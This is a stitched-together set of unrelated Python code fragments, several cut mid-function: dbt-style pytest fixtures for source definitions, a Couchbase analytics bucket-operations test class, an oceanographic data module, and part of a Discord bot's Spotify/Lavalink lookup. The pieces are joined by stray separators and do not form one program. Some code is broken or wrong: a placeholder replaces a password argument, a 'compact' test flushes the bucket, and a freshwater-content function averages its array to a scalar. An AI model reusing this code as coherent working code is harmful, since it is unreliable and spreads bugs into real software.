def basic_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'description': '',
'columns': {},
'quoting': {},
'unique_id': 'test.source.my_source.my_source_table',
'meta': {},
'source_meta': {},
'tags': [],
'config': {
'enabled': True,
},
'unrendered_config': {},
}
@pytest.fixture
def basic_parsed_source_definition_object():
return ParsedSourceDefinition(
columns={},
database='some_db',
description='',
fqn=['test', 'source', 'my_source', 'my_source_table'],
identifier='my_source_table',
loader='stitch',
name='my_source_table',
original_file_path='/root/models/sources.yml',
package_name='test',
path='/root/models/sources.yml',
quoting=Quoting(),
resource_type=NodeType.Source,
root_path='/root',
schema='some_schema',
source_description='my source description',
source_name='my_source',
unique_id='test.source.my_source.my_source_table',
tags=[],
config=SourceConfig(),
)
@pytest.fixture
def complex_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'description': '',
'columns': {},
'quoting': {},
'unique_id': 'test.source.my_source.my_source_table',
'meta': {},
'source_meta': {},
'tags': ['my_tag'],
'config': {
'enabled': True,
},
'freshness': {
'warn_after': {'period': 'hour', 'count': 1},
},
'loaded_at_field': 'loaded_at',
'unrendered_config': {},
}
@pytest.fixture
def complex_parsed_source_definition_object():
return ParsedSourceDefinition(
columns={},
database='some_db',
description='',
fqn=['test', 'source', 'my_source', 'my_source_table'],
identifier='my_source_table',
loader='stitch',
name='my_source_table',
original_file_path='/root/models/sources.yml',
package_name='test',
path='/root/models/sources.yml',
quoting=Quoting(),
resource_type=NodeType.Source,
root_path='/root',
schema='some_schema',
source_description='my source description',
source_name='my_source',
unique_id='test.source.my_source.my_source_table',
tags=['my_tag'],
config=SourceConfig(),
freshness=FreshnessThreshold(warn_after=Time(period=TimePeriod.hour, count=1)),
loaded_at_field='loaded_at',
)
def test_basic_source_definition(minimum_parsed_source_definition_dict, basic_parsed_source_definition_dict, basic_parsed_source_definition_object):
node = basic_parsed_source_definition_object
node_dict = basic_parsed_source_definition_dict
minimum = minimum_parsed_source_definition_dict
assert_symmetric(node, node_dict, ParsedSourceDefinition)
assert node.is_ephemeral is False
assert node.is_refable is False
assert node.has_freshness is False
assert_from_dict(node, minimum, ParsedSourceDefinition)
pickle.loads(pickle.dumps(node))
def test_invalid_missing(minimum_parsed_source_definition_dict):
bad_missing_name = minimum_parsed_source_definition_dict
del bad_missing_name['name']
assert_fails_validation(bad_missing_name, ParsedSourceDefinition)
def test_invalid_bad_resource_type(minimum_parsed_source_definition_dict):
bad_resource_type = minimum_parsed_source_definition_dict
bad_resource_type['resource_type'] = str(NodeType.Model)
assert_fails_validation(bad_resource_type, ParsedSourceDefinition)
def test_complex_source_definition(complex_parsed_source_definition_dict, complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
node_dict = complex_parsed_source_definition_dict
assert_symmetric(node, node_dict, ParsedSourceDefinition)
assert node.is_ephemeral is False
assert node.is_refable is False
assert node.has_freshness is True
pickle.loads(pickle.dumps(node))
def test_source_no_loaded_at(complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
assert node.has_freshness is True
# no loaded_at_field -> does not have freshness
node.loaded_at_field = None
assert node.has_freshness is False
def test_source_no_freshness(complex_parsed_source_definition_object):
node = complex_parsed_source_definition_object
assert node.has_freshness is True
node.freshness = None
assert node.has_freshness is False
unchanged_source_definitions = [
lambda u: (u, u.replace(tags=['mytag'])),
lambda u: (u, u.replace(meta={'a': 1000})),
]
changed_source_definitions = [
lambda u: (u, u.replace(freshness=FreshnessThreshold(warn_after=Time(period=TimePeriod.hour, count=1)), loaded_at_field='loaded_at')),
lambda u: (u, u.replace(loaded_at_field='loaded_at')),
lambda u: (u, u.replace(freshness=FreshnessThreshold(error_after=Time(period=TimePeriod.hour, count=1)))),
lambda u: (u, u.replace(quoting=Quoting(identifier=True))),
lambda u: (u, u.replace(database='other_database')),
lambda u: (u, u.replace(schema='other_schema')),
lambda u: (u, u.replace(identifier='identifier')),
]
@pytest.mark.parametrize('func', unchanged_source_definitions)
def test_compare_unchanged_parsed_source_definition(func, basic_parsed_source_definition_object):
node, compare = func(basic_parsed_source_definition_object)
assert node.same_contents(compare)
@pytest.mark.parametrize('func', changed_source_definitions)
def test_compare_changed_source_definition(func, basic_parsed_source_definition_object):
node, compare = func(basic_parsed_source_definition_object)
assert not node.same_contents(compare)
@pytest.fixture
def minimal_parsed_exposure_dict():
return {
'name': 'my_exposure',
'type': 'notebook',
'owner': {
'email': '<EMAIL>',
},
'fqn': ['test', 'exposures', 'my_exposure'],
'unique_id': 'exposure.test.my_exposure',
'package_name': 'test',
'path': 'models/something.yml',
'root_path': '/usr/src/app',
'original_file_path': 'models/something.yml',
}
@pytest.fixture
def basic_parsed_exposure_dict():
return {
'name': 'my_exposure',
'type': 'notebook',
'owner': {
'email': '<EMAIL>',
},
'resource_type': 'exposure',
'depends_on': {
'nodes': [],
'macros': [],
},
'refs': [],
'sources': [],
'fqn': ['test', 'exposures', 'my_exposure'],
'unique_id': 'exposure.test.my_exposure',
'package_name': 'test',
'path': 'models/something.yml',
'root_path': '/usr/src/app',
'original_file_path': 'models/something.yml',
}
@pytest.fixture
def basic_parsed_exposure_object():
return ParsedExposure(
name='my_exposure',
| |
import json
import time
from BucketLib.BucketOperations import BucketHelper
from cb_tools.cbstats import Cbstats
from cbas_base import CBASBaseTest
from couchbase_helper.documentgenerator import doc_generator
from memcached.helper.data_helper import MemcachedClientHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from sdk_exceptions import SDKException
class CBASBucketOperations(CBASBaseTest):
def setUp(self):
super(CBASBucketOperations, self).setUp()
''' Considering all the scenarios where:
1. There can be 1 KV and multiple cbas nodes
(and tests wants to add all cbas into cluster.)
2. There can be 1 KV and multiple cbas nodes
(and tests wants only 1 cbas node)
3. There can be only 1 node running KV,CBAS service.
NOTE: Cases pending where there are nodes which are running only cbas.
For that service check on nodes is needed.
'''
if self.bucket_time_sync:
self.bucket_util._set_time_sync_on_buckets(["default"])
self.cluster_util.print_cluster_stats()
self.bucket_util.print_bucket_stats()
def tearDown(self):
self.cleanup_cbas()
super(CBASBucketOperations, self).tearDown()
def setup_for_test(self, skip_data_loading=False):
if not skip_data_loading:
# Load Couchbase bucket first
self.perform_doc_ops_in_all_cb_buckets(
"create",
0,
self.num_items,
durability=self.durability_level)
self.bucket_util.verify_stats_all_buckets(self.num_items)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts before dataset creation")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Create dataset on the CBAS bucket
self.cbas_util.create_dataset_on_bucket(
cbas_bucket_name=self.cb_bucket_name,
cbas_dataset_name=self.cbas_dataset_name)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset creation")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Create indexes on the CBAS bucket
self.create_secondary_indexes = \
self.input.param("create_secondary_indexes", True)
if self.create_secondary_indexes:
self.index_fields = "profession:string,number:bigint"
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, self.index_fields)
status, metrics, errors, results, _ = \
self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(
self.index_name,
self.index_fields.split(","),
self.cbas_dataset_name)[0])
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset connect")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key", 0, self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
if not skip_data_loading:
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def load_docs_in_cb_bucket_before_cbas_connect(self):
self.setup_for_test()
def load_docs_in_cb_bucket_before_and_after_cbas_connect(self):
self.setup_for_test()
# Load more docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.bucket_util.verify_stats_all_buckets(self.num_items*2)
if self.test_abort_snapshot:
self.log.info("Creating sync_write aborts after dataset connect")
for server in self.cluster_util.get_kv_nodes():
ssh_shell = RemoteMachineShellConnection(server)
cbstats = Cbstats(ssh_shell)
replica_vbs = cbstats.vbucket_list(
self.bucket_util.buckets[0].name,
"replica")
load_gen = doc_generator("test_abort_key",
self.num_items,
self.num_items,
target_vbucket=replica_vbs)
success = self.bucket_util.load_durable_aborts(
ssh_shell, [load_gen],
self.bucket_util.buckets[0],
self.durability_level,
"update", "all_aborts")
if not success:
self.log_failure("Simulating aborts failed")
ssh_shell.disconnect()
self.validate_test_failure()
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def load_docs_in_cb_bucket_after_cbas_connect(self):
self.setup_for_test(skip_data_loading=True)
# Load Couchbase bucket first.
self.perform_doc_ops_in_all_cb_buckets(
"create",
0,
self.num_items)
self.bucket_util.verify_stats_all_buckets(self.num_items)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_some_docs_in_cb_bucket(self):
self.setup_for_test()
# Delete some docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_all_docs_in_cb_bucket(self):
self.setup_for_test()
# Delete all docs in Couchbase bucket.
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def update_some_docs_in_cb_bucket(self):
self.setup_for_test()
# Update some docs in Couchbase bucket
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items / 10,
mutation_num=1)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items,
self.num_items / 10):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def update_all_docs_in_cb_bucket(self):
self.setup_for_test()
# Update all docs in Couchbase bucket
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items, mutation_num=1)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def create_update_delete_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Perform Create, Update, Delete ops in the CB bucket
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.bucket_util.verify_stats_all_buckets(self.num_items*2)
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items,
mutation_num=1)
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 3 / 2,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def create_update_delete_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Perform Create, Update, Delete ops in the CB bucket
self.perform_doc_ops_in_all_cb_buckets(
"create",
self.num_items,
self.num_items * 2)
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items,
mutation_num=1)
self.perform_doc_ops_in_all_cb_buckets(
"delete",
0,
self.num_items / 2)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items * 3 / 2,
self.num_items / 2):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def flush_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Flush the CB bucket
BucketHelper(self.cluster.master).flush_bucket(self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def flush_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Flush the CB bucket
BucketHelper(self.cluster.master).flush_bucket(self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Delete the CB bucket
self.cluster.bucket_delete(server=self.cluster.master,
bucket=self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def delete_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Delete the CB bucket
self.cluster.bucket_delete(server=self.cluster.master,
bucket=self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=<PASSWORD>)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name, 0):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
"""
cbas.cbas_bucket_operations.CBASBucketOperations:
delete_kv_bucket_then_drop_dataset_without_disconnecting_link,
cb_bucket_name=default,cbas_bucket_name=default_cbas,
cbas_dataset_name=ds,num_items=10000
"""
def delete_kv_bucket_then_drop_dataset_without_disconnecting_link(self):
# setup test
self.setup_for_test()
# Delete the KV bucket
deleted = BucketHelper(self.cluster.master).delete_bucket()
self.assertTrue(deleted, "Deletion of KV bucket failed")
# Check Bucket state
start_time = time.time()
while start_time + 120 > time.time():
status, content, _ = self.cbas_util.fetch_bucket_state_on_cbas()
self.assertTrue(status, msg="Fetch bucket state failed")
content = json.loads(content)
self.log.info(content)
if content['buckets'][0]['state'] == "disconnected":
break
self.sleep(1)
# Drop dataset with out disconnecting the Link
self.sleep(2, message="Sleeping 2 seconds after bucket disconnect")
self.assertTrue(self.cbas_util.drop_dataset(self.cbas_dataset_name),
msg="Failed to drop dataset")
def compact_cb_bucket_with_cbas_connected(self):
self.setup_for_test()
# Compact the CB bucket
BucketHelper(self.cluster.master).flush_bucket(self.cb_bucket_name)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match "
"that in the CB bucket")
def compact_cb_bucket_then_cbas_connect(self):
self.setup_for_test()
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
# Compact the CB bucket
BucketHelper(self.cluster.master).compact_bucket(self.cb_bucket_name)
# Connect to Bucket
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Validate no. of items in CBAS dataset
if not self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items):
self.fail("No. of items in CBAS dataset do not match"
"that in the CB bucket")
def test_ingestion_resumes_on_reconnect(self):
self.setup_for_test()
self.perform_doc_ops_in_all_cb_buckets(
"update",
0,
self.num_items / 4,
mutation_num=1)
self.cbas_util.validate_cbas_dataset_items_count(
self.cbas_dataset_name,
self.num_items,
self.num_items / 4)
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(self.cbas_bucket_name)
self.perform_doc_ops_in_all_cb_buckets(
"update",
self.num_items / 4,
self.num_items / 2,
mutation_num=1)
# Connect to Bucket and sleep for 2s to allow ingestion to start
self.cbas_util.connect_to_bucket(
cbas_bucket_name=self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(5)
# Validate no. of items in CBAS dataset
count, mutated_count = self.cbas_util.get_num_items_in_cbas_dataset(
self.cbas_dataset_name)
if not (self.num_items / 4 < mutated_count):
self.fail("Count after bucket connect = %s. "
"Ingestion has restarted." % mutated_count)
else:
self.log.info("Count after bucket connect = %s", mutated_count)
def test_ingestion_after_kv_rollback(self):
self.setup_for_test()
# Stop Persistence on Node A & Node B
self.log.info("Stopping persistence on NodeA & NodeB")
mem_client = MemcachedClientHelper.direct_client(self.input.servers[0],
self.cb_bucket_name)
mem_client.stop_persistence()
mem_client = MemcachedClientHelper.direct_client(self.input.servers[1],
self.cb_bucket_name)
mem_client.stop_persistence()
# | |
<filename>GFPy/Ocean.py
# -*- coding: utf-8 -*-
"""
This module contains functions that read (and plot) various
oceanographic instrument data. This includes:
- CTD (incl. mini CTD)
- ADCP
- drifter
- mooring
The functions are optimized for the file formats typically used
in student cruises at the Geophysical Institute.
"""
from seabird.cnv import fCNV
import gsw
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from netCDF4 import Dataset,num2date
import glob
from scipy.interpolate import interp1d,griddata
import scipy.io as spio
from scipy.io import loadmat
from matplotlib.dates import date2num,datestr2num
import cmocean
import cartopy.crs as ccrs
import cartopy.feature
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import pandas as pd
from adjustText import adjust_text as adj_txt
############################################################################
# MISCELLANEOUS FUNCTIONS
############################################################################
def cal_dist_dir_on_sphere(longitude, latitude):
"""
function to calculate a series of distances between
coordinate points (longitude and latitude)
of the drifter between sequential timesteps
Parameters
----------
longitude : pd.Series
time Series of logitudinal coordinates [deg] of the ship
latitude : pd.Series
time Series of latitudinal coordinates [deg] of the ship
Returns
-------
speed : pd.Series
speed the drifter travelled between each of the timesteps
heading : pd.Series
direction drifter headed between each of the timesteps
"""
# Define the Earths Radius (needed to estimate distance on Earth's sphere)
R = 6378137. # [m]
# Convert latitude and logitude to radians
lon = longitude * np.pi/180.
lat = latitude * np.pi/180.
# Calculate the differential of lon and lat between the timestamps
dlon = lon.diff()
dlat = lat.diff()
# Create a shifted time Series
lat_t1 = lat.shift(periods=1)
lat_t2 = lat.copy()
# Calculate interim stage
alpha = np.sin(dlat/2.)**2 + np.cos(lat_t1) * np.cos(lat_t2) * np.sin(dlon/2.)**2
distance = 2*R*np.arctan2(np.sqrt(alpha),np.sqrt(1-alpha))#(np.arcsin(np.sqrt(alpha))
time_delta = pd.Series((lat.index[1:]-lat.index[0:-1]).seconds, index = lat.index[1::])
speed = (distance/time_delta)
# Calculate the ships heading
arg1 = np.sin(dlon) * np.cos(lat_t2)
arg2 = np.cos(lat_t1) * np.sin(lat_t2) -np.sin(lat_t1) * np.cos(lat_t2) * np.cos(dlon)
heading = np.arctan2(arg1,arg2) * (-180./np.pi) + 90.0
heading[heading<0.0] = heading + 360.
heading[heading>360.0] = heading - 360.
return speed, heading
def cart2pol(u,v,ctype='math'):
'''
Converts cartesian velocity (u,v) to polar velocity (angle,speed),
using either
1) mathematical
2) oceanographical, or
3) meteorological
definition.
Parameters
----------
u : numeric, or array-like
u-Component of velocity.
v : numeric, or array-like
v-Component of velocity.
ctype : string, optional
Type of definitition, 'math', 'ocean' or 'meteo'. The default is 'math'.
Returns
-------
angle : numeric, or array-like
Angle of polar velocity.
speed : numeric, or array-like
Speed of polar velocity.
'''
speed = np.sqrt(u**2 + v**2)
if ctype == 'math':
angle = 180/np.pi* np.arctan2(v,u)
if ctype in ['meteo','ocean']:
angle = 180 / np.pi * np.arctan2(u,v)
if ctype == 'meteo':
angle = (angle+180)%360
return angle,speed
def pol2cart(angle,speed,ctype='math'):
'''
Converts polar velocity (angle,speed) to cartesian velocity (u,v),
using either
1) mathematical
2) oceanographical, or
3) meteorological
definition.
Parameters
----------
angle : numeric, or array-like
Angle of polar velocity.
speed : numeric, or array-like
Speed of polar velocity.
ctype : string, optional
Type of definitition, 'math', 'ocean' or 'meteo'. The default is 'math'.
Returns
-------
u : numeric, or array-like
u-Component of velocity.
v : numeric, or array-like
v-Component of velocity.
'''
if ctype == 'math':
u = speed * np.cos(angle*np.pi/180.)
v = speed * np.sin(angle*np.pi/180.)
elif ctype == 'meteo':
u = -speed * np.sin(angle*np.pi/180.)
v = -speed * np.cos(angle*np.pi/180.)
elif ctype == 'ocean':
u = speed * np.sin(angle*np.pi/180.)
v = speed * np.cos(angle*np.pi/180.)
return u,v
def create_latlon_text(lat,lon):
'''
Creates two strings which contain a text for latitude and longitude
Parameters
----------
lat : scalar
latitude.
lon : scalar
longitude.
Returns
-------
latstring : str
the string for the latitude.
lonstring : str
the string for the longitude.
'''
lat_minutes = str(np.round((np.abs(lat - int(lat)))*60,5))
if lat < 0:
lat_letter = 'S'
else:
lat_letter = 'N'
latstring = str(int(np.abs(lat)))+ ' ' + lat_minutes + ' ' + lat_letter
lon_minutes = str(np.round((np.abs(lon - int(lon)))*60,5))
if lon < 0:
lon_letter = 'W'
else:
lon_letter = 'E'
lonstring = str(int(np.abs(lon)))+ ' ' + lon_minutes + ' ' + lon_letter
return latstring,lonstring
def CTD_to_grid(CTD,stations=None,interp_opt= 1,x_type='distance'):
'''
This function accepts a CTD dict of dicts, finds out the maximum
length of the depth vectors for the given stations, and fills all
fields to that maximum length, using np.nan values.
Parameters
----------
CTD : dict of dicts
CTD data. Is created by `read_CTD`
stations : array_like, optional
list of stations to select from `CTD`.
interp_opt : int, optional
flag how to interpolate over X (optional).
0: no interpolation,
1: linear interpolation, fine grid (default),
2: linear interpolation, coarse grid. The default is 1.
x_type : str, optional
whether X is 'time' or 'distance'. The default is 'distance'.
Returns
-------
fCTD : dict
dict with the gridded CTD data.
Z : array_like
common depth vector.
X : array_like
common X vector.
station_locs : array_like
locations of the stations as X units.
'''
# if no stations are given, take all stations available
if stations is None:
stations = list(CTD.keys())
else:
CTD = {key:CTD[key] for key in stations}
# construct the Z-vector from the max and min depth of the given stations
maxdepth = np.nanmax([np.nanmax(-CTD[i]['z']) for i in stations])
mindepth = np.nanmin([np.nanmin(-CTD[i]['z']) for i in stations])
Z = np.linspace(mindepth,maxdepth,int(maxdepth-mindepth)+1)
# construct the X-vector, either distance or time
if x_type == 'distance':
LAT = np.asarray([d['LAT'] for d in CTD.values()])
LON = np.asarray([d['LON'] for d in CTD.values()])
X = np.insert(np.cumsum(gsw.distance(LON,LAT)/1000),0,0)
elif x_type == 'time':
X = np.array([date2num(d['datetime']) for d in CTD.values()])
X = (X - X[0])*24
# this X vector is where the stations are located, so save that
station_locs = X[:]
fields = set([field for field in CTD[stations[0]]
if np.size(CTD[stations[0]][field]) > 1])
# original grids
X_orig,Z_orig = [f.ravel() for f in np.meshgrid(X,Z)]
# new grids in case of 2-d interpolation
if interp_opt == 1:
X_int = np.linspace(np.min(X),np.max(X),len(X)*20) # create fine X grid
Z_int = Z[:]
elif interp_opt == 2:
X_int = np.linspace(np.min(X),np.max(X),20) # create coarse X grid
Z_int = np.linspace(mindepth,maxdepth,50)
fCTD = {}
for field in fields:
try:
# grid over Z
temp_array = []
for value in CTD.values():
if field in value:
temp_array.append(interp1d(-value['z'],value[field],
bounds_error=False)(Z))
else:
temp_array.append(interp1d(Z,Z*np.nan,
bounds_error=False)(Z))
temp_array = np.array(temp_array).transpose()
if interp_opt == 0: # only grid over Z
fCTD[field] = temp_array
else: # grid over Z and X
temp_array = temp_array.ravel()
mask = np.where(~np.isnan(temp_array)) # NaN mask
# grid in X and Z
fCTD[field] = griddata((X_orig[mask],Z_orig[mask]), # old grid
temp_array[mask], # data
tuple(np.meshgrid(X_int,Z_int))) # new grid
except:
print('Warning: No gridding possible for '+field+'. Maybe ' \
'no valid data? Setting to nan...')
if interp_opt == 0:
fCTD[field] = np.meshgrid(X,Z)[0] * np.nan
else:
fCTD[field] = np.meshgrid(X_int,Z_int)[0] * np.nan
if interp_opt > 0:
X,Z = X_int,Z_int
return fCTD,Z,X,station_locs
def calc_freshwater_content(salinity,depth,ref_salinity=34.8):
'''
Calculates the freshwater content from a profile of salinity and depth.
Parameters
----------
salinity : array-like
The salinity vector.
depth : TYPE
The depth vector.
ref_salinity : float, optional
The reference salinity. The default is 34.8.
Returns
-------
float
The freshwater content for the profile, in meters
'''
try:
idx = np.where(salinity>ref_salinity)[0][0]
salinity = salinity[:idx]
depth = depth[:idx]
except:
pass
salinity = np.mean([salinity[1:],salinity[:-1]])
dz = np.diff(depth)
return np.sum((salinity-ref_salinity)/ref_salinity *dz)
def myloadmat(filename):
'''
this function should be called instead of direct spio.loadmat
as it cures the problem of not properly recovering python dictionaries
from mat files. It calls the function check keys to cure all entries
which are still mat-objects
'''
def _check_keys(d):
'''
checks if entries in dictionary are mat-objects. If yes
todict is called to change them to nested dictionaries
'''
for key in d:
if isinstance(d[key], spio.matlab.mio5_params.mat_struct):
d[key] = _todict(d[key])
return d
def _todict(matobj):
'''
A recursive function which constructs from matobjects nested dictionaries
'''
d = {}
for strg in matobj._fieldnames:
elem = matobj.__dict__[strg]
if isinstance(elem, spio.matlab.mio5_params.mat_struct):
d[strg] = _todict(elem)
elif isinstance(elem, np.ndarray):
d[strg] = _tolist(elem)
else:
d[strg] = elem
return d
def | |
in query.lower():
query = query.split('&')[0]
try:
results = await self.bot.lavalink.get_tracks(query, node=node)
except asyncio.TimeoutError:
results = {'playlistInfo': {},
'loadType': 'NO_MATCHES', 'tracks': []}
if isinstance(results, dict):
return results
return {'playlistInfo': {}, 'loadType': 'NO_MATCHES', 'tracks': []}
async def prepare_spotify(self, ctx, query, node=None, infinite_loop=False, max_tracks: int = 100):
""" Prepares a Spotify URI or URL to be played with lavalink"""
# Convert URL to URI
if match_url(query) and 'open.spotify' in query:
query += "?" # To difficult/long to explain why
base = "spotify:"
for m in ''.join(query.split('spotify.com/')[1:]).split("/"):
base += f"{m}:"
query = base.split("?")[0]
results = {'playlistInfo': {}, 'loadType': 'NO_MATCHES', 'tracks': []}
if query.startswith('spotify:'): # probably a spotify URI
if self.bot.spotify:
original_query = query
query = query.split(":", 1)[1]
if query.startswith('track:'):
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_track(query)
query = res['artists'][0]['name'] + ' ' + res['name']
song = await self.prepare_url(query=query, node=node)
if song and song['tracks']:
results['tracks'].append(song['tracks'][0])
results['loadType'] = "TRACK_LOADED"
elif query.startswith('album:'):
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_album(query)
procmesg = await ctx.send(get_str(ctx, "music-spotify-processing-a").format(f"`{res['name']}`"))
base_content = procmesg.content
tracks_found = len(res['tracks']['items'])
for num, i in enumerate(res['tracks']['items'][:max_tracks], start=1):
try:
query = i['name'] + ' ' + i['artists'][0]['name']
log.debug('Processing {0}'.format(query))
song = await self.prepare_url(query=query, node=node)
results['tracks'].append(song['tracks'][0])
results['loadType'] = "PLAYLIST_LOADED"
results['playlistInfo'] = {
'selectedTrack': -1, 'name': res['name']}
except (KeyError, IndexError, TypeError):
tracks_found -= 1
